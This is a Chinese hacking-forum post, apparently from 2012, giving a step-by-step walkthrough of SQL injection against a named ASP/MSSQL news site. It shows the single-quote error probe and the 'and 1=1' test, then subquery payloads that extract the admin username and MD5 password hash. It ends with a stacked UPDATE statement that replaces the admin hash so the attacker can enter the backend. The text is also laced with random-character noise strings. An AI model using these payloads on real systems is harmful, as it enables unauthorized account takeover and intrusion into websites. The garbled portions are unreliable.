经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
; V9 B' G4 D0 j! t/ ^9 ]可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
8 \2 g9 |% o- B, Y, k0 N测试如下:0 p! K7 q6 x% m% w6 p; G/ f4 e
http://www.tmdsb.com/news.asp?id=121
4 }. I( r y3 ~" r' S- q/ g5 z在地址后输入单引号,显示8 m: p3 e% g5 l. h0 H5 F5 E
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’3 _! o/ w# n" F' y
字符串 ’’’ 之前有未闭合的引号! m$ H; Z4 R! y3 [! U( r
/news/tmdws.asp,行63
; X6 V, x1 u# B说明没有过滤单引号且数据库是MSSQL.
2 i: [' V4 f$ H5 u' a& Kand 1=1正常。and 1=2出错。肯定存在注入+ Q( T4 ]9 O' B: S$ K
接着输入* ]- M# B) f4 R2 Z
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
5 Z" B2 o+ y8 |0 a+ R; W. [得到帐号为:admin
. ?. g- R/ Z U$ [: C9 A0 shttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
; i8 O- l+ p- v( x得到密码为:a4716077c2ba075c
2 J1 v. v: [0 u4 w0 r& w" \接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433$ g0 J1 Y1 j4 r
命令如下 :
$ I( W3 H8 Y! C* F! G+ j, r* \8 b$ ?;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–4 r9 `. O# F' V8 o
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41